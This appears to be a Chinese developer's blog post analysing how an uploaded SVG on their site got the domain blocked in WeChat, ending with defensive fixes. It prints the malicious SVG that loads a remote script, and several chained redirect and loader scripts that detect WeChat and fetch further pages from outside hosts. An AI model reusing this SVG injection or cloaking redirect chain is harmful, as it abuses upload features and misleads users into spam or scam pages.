【已停止访问该网页】由一张图片引发的“血案”

先看个热闹

突然一天在微信上打不开我的域名了,被封了


image.png

然后我要疯,我没有这个svg啊,虽然系统中有图片上传的地方,但是也不会用到这个svg啊


image.png

想想,可能有人通过我的系统免费上传了这个svg然后在其他地方用了这个免费的资源流量。

下载这个svg,文本编辑器打开源码

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="3.5in" height="1in">
    <script type="text/javascript" xlink:href="https://ookwqc.com/t"></script>
</svg>

打开https://ookwqc.com/t域名


(function() {
            var ua = navigator.userAgent.toLowerCase();
            try { document.getElementsByTagName("body")[0].outerHTML = "<center>Loading...</center>"; } catch (e) {};
            if (/micromessenger/.test(ua)) {
                if (top != window || !document.body) {
                    top.location.href = 'http://vcover.yayagushi.com/30004981820190320222503uc.jpg?now=1554189153';
                } else {
                    var a = document.createElement('a');
                    a.href = 'http://vcover.yayagushi.com/30004981820190320222503uc.jpg?now=1554189153';
                    a.rel = 'noreferrer';
                    a.click();
                }
            }
        })()

上面一段代码写的很有意思,如果是微信浏览器打开是一张图片,否则是另外一张图片。
但是————不要被后缀伪装给迷惑了。
查询域名备案信息,哇塞备案了差不多500个域名,真流弊


image.png

打开微信那张照片

页面空白,但是作为开发人员,打开F12,哇塞

image.png

这个地址只是一个以jpg结尾的svg文件请求地址。
其中https://05ez.com/t又去获取下一个地址

image.png

不死不休,继续追踪<u>http://rf9maug.5ltj6b9d.tw/05d.html?now=1554192363</u>
F12照看一下

<!DOCTYPE html>
<html lang="en"><head>
<meta charset="UTF-8"><title></title></head><body>
<script src="https://05ez.com/d"></script>
</body></html>

继续找<u>https://05ez.com/d</u>

var _shareUrl = 'https://05ez.com';
var hm_c = 'a71a8a3c027d8f8703df08f83e95ef39';

function _getParam(name) {
    return location.href.match(new RegExp('[?&]' + name + '=([^?&#]+)', 'i')) ? decodeURIComponent(RegExp.$1) : '';
}
var ua = navigator.userAgent.toLowerCase();
if (/micromessenger/.test(ua)) {
    var _lay = document.createElement('div');
    _lay.setAttribute('style', 'width:100%;height:2048px;font-size:1.4em;position:absolute;' +
        'background-color:white;z-index:99999999;left:0;top:0;');
    _lay.innerHTML = '<div style="color:black;text-align:center;font-size:1.3em">loading...</div>';
    if (document.body) document.body.appendChild(_lay);
    document.title = "正在打开...";
    var xhr = new XMLHttpRequest;
    var html = null;

    function getParam(name, url) {
        var r = new RegExp('(?|#|&)' + name + '=(.*?)(#|&|$)');
        var m = (url || location.href).match(r);
        return (m ? m[2] : '')
    }
    function render() {
        var a = document.open("text/html", "replace");
        a.write(html);
        a.close()
    }
    xhr.onload = function () {
        html = xhr.responseText;
        var delay = 0;
        if (delay > 0) setTimeout("render()", delay * 1000); else render()
    };
    xhr.open("GET", "https://lbbb.oss-cn-hangzhou.aliyuncs.com/hb_v3/index.html?t=" + Date.now(), !0);
    xhr.send();
}

打开上面的页面

<u>https://lbbb.oss-cn-hangzhou.aliyuncs.com/hb_v3/index.html</u>

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <title>...</title>
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0,viewport-fit=cover" />
  <meta name="format-detection" content="telephone=no">
  <meta name="applicable-device" content="mobile">
  <link rel="stylesheet" href="//lifescore.oss-cn-qingdao.aliyuncs.com/hb_v2/js/d.css">
  <script>
    window.focusLocation = {};
  </script>
</head>

<body>
  <script src="//res.wx.qq.com/open/js/jweixin-1.0.0.js"></script>
  <script src="//lifescore.oss-cn-qingdao.aliyuncs.com/hb_v2/js/jquery.min.js"></script>
  <script src="//lifescore.oss-cn-qingdao.aliyuncs.com/hb_v2/js/core.js"></script>
  <script src="https://05ez.com/case/info?var=window.data"></script>

  <script>
    // M.loadJS('/js/i_d.js?v=' + (+new Date()));
    M.loadJS('https://lbbb.oss-cn-hangzhou.aliyuncs.com/hb_v3/js/i_d.js?v=' + (+new Date()));
  </script>
</body>

</html>

瞅一眼那个JS

<u>https://lbbb.oss-cn-hangzhou.aliyuncs.com/hb_v3/js/i_d.js</u>

js.png

好了找到地方了,多么喜庆。
image.png

找到问题就解决吧

再来找找这个svg文件上传的日志

2019-03-10T13:08:35.866304Z {"Accept-Encoding":"gzip","Content-Length":"992","Content-Type":"multipart/form-data; boundary=------------------------78ff25155c5e6156","IP":"127.0.0.1","User-Agent":"Go-http-client/1.1","X-Forwarded-For":"112.96.135.XXX157.255.155.XXX"X-Real-Ip":"157.255.155.XXX"X-Reqid":"DQYAAMIr4LjhmooV","X-Scheme":"http"} {"key":"XXX.svg","hash":"e5gx5xekD","bucket":"","fsize":252}

解决方案

1)限制系统中头像上传的文件类型为jpg/png (app端会裁剪照片,这2个类型够用)

2)如果使用第三方对象存储,建议修改秘钥

3)在nginx或者slb上限制该恶意ip,并设置SLB黑名单

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,539评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,911评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,337评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,723评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,795评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,762评论 1 294
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,742评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,508评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,954评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,247评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,404评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,104评论 5 340
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,736评论 3 324
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,352评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,557评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,371评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,292评论 2 352

推荐阅读更多精彩内容